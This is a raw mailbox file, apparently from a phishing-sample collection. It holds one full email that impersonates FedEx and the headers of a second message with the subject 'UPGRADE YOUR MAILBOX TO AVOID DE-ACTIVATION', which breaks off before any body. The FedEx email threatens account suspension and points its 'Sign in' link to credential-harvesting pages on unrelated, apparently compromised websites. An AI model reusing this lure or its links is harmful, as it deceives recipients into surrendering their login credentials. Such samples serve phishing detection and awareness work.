From: FedEx <aperreault@gallowayauto.com>
Date: Tue, 22 Aug 2017 10:56:01 -0400
Message-ID: <26f5dc63-7bfe-4a07-bd22-1221199c7d9d@inh-exch-01.inh.local>
Return-Path: aperreault@gallowayauto.com
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 289

--===============0642426990==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =


Dear Customer,

 Due to the congestion in all FedEx users accounts, FedEx ! would be shutti=
ng down all unused accounts. We advise that you =

update your account to avoid suspension                                    =
                                                                           =
                            =

 Please "Sign in"  To update your Account =

 The update requested is for the safety of your FedEx Account.
  Sincerely ,
 FedEx Customer Service
  =

=20
--===============0642426990==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head>
<blockquote><span><img class=3D"gmail-CToWUd" src=3D"https://ci4.googleuser=
content.com/proxy/eAZFHQSwjsxdEz6GNQukeJVx1eki1uZ3QRuihir_Zsv_Tj5-6raRLfr8A=
Ofc1EJQrFgR6xnhYCoWcnCu4k3QYlJTScotWTmlCUuGk1VgM93MBURsvo5GCYtwh8lvGSnElsOq=
cKAvGg=3Ds0-d-e1-ft#http://img1.wikia.nocookie.net/__cb20121112030619/logop=
edia/images/a/a6/FedEx.png" alt=3D"" width=3D"56" height=3D"26" /><br /><br=
 /></span><span style=3D"font-family: georgia, serif;">Dear Customer,<br />=
<br /></span></blockquote>
<blockquote><span style=3D"font-family: georgia, serif;">Due to the congest=
ion in all&nbsp;<span class=3D"gmail-il">FedEx</span>&nbsp;users accounts,&=
nbsp;<span class=3D"gmail-il">FedEx</span>&nbsp;! would be shutting down al=
l unused accounts. We advise that you&nbsp;<br />update your account to avo=
id suspension &nbsp;<span>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; =
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp=
; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nb=
sp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &=
nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;=
 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbs=
p; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><br /></sp=
an>
<p><span style=3D"font-family: georgia, serif;">Please<a href=3D"http://www=
.soberanatransportes.com.br//wp-admin/user/index.php" rel=3D"nofollow" targ=
et=3D"_blank">&nbsp;</a><a href=3D"http://galeriaretxa.com/index.php" rel=
=3D"nofollow" target=3D"_blank"><strong>"Sign in"</strong><span class=3D"gm=
ail-m_6416011759664869326Apple-converted-space">&nbsp;</span></a>&nbsp;To u=
pdate your Account&nbsp;</span></p>
<p><span style=3D"font-family: georgia, serif;">The update requested is for=
 the safety of your&nbsp;<span class=3D"gmail-il">FedEx</span>&nbsp;Account=
.</span></p>
<p><span style=3D"font-family: georgia, serif;">&nbsp;Sincerely ,</span></p>
<p><span style=3D"font-family: georgia, serif;">FedEx Customer Service</spa=
n></p>
<p>&nbsp;</p>
</blockquote></html>
--===============0642426990==--

From jose@monkey.org Thu Aug 24 00:28:53 2017 +0000
Return-Path: postmaster@greymail1.com
Delivered-To: jose@monkey.org
X-FDA: 73206412146.15.tax13_4d9810e1f253f
X-Spam-Summary: 85,1,0,8384073da8172bfc,d41d8cd98f00b204,postmaster@greymail1.com,:postmaster@greymail1.com,RULES_HIT:1:41:72:152:379:474:962:966:967:973:978:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1430:1431:1433:1434:1436:1437:1516:1517:1518:1568:1571:1575:1588:1589:1592:1594:1714:1719:1730:1777:1792:2194:2196:2199:2200:2525:2527:2560:2563:2636:2682:2685:2693:2827:2859:2900:2902:2933:2937:2939:2942:2945:2947:2951:2954:3022:3041:3138:3139:3140:3141:3142:3690:3865:3866:3867:3868:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4184:4321:4361:4384:4385:4395:4552:5007:6261:6671:6672:6678:6687:7903:8583:8603:8671:8987:9025:9121:9388:9411:9416:9908:10007:10046:10049:10214:10346:11233:11473:11658:11783:11914:12043:12295:12438:12517:12519:12555:12561:12658:12660:12740:12764:12895:12903:12986:13007:13008:13139:13199:13229:13237:13975:14051:14096:14515:14846:21060:21080:21433:21436:21451:21524:21627:30022:30026:30054:30070,0,RBL:209.239.112.100-irl.urbl.hosted
X-HE-Tag: tax13_4d9810e1f253f
X-Filterd-Recvd-Size: 13401
Received: from greymail1.com (smtp1.greymail1.com [209.239.112.100])
	by imf06.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 24 Aug 2017 00:28:53 +0000 (UTC)
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
X-No-Relay: not in my network
Received: from aws-remoteapp.gjp.local (ec2-52-67-36-254.sa-east-1.compute.amazonaws.com [52.67.36.254])
	by greymail1.com (Postfix) with ESMTPSA id BDE121E886B7;
	Thu, 24 Aug 2017 02:28:48 +0200 (CEST)
Content-Type: multipart/alternative; boundary="===============2139199445=="
MIME-Version: 1.0
Subject: UPGRADE YOUR MAILBOX TO AVOID DE-ACTIVATION
To: Recipients <postmaster@greymail1.com>
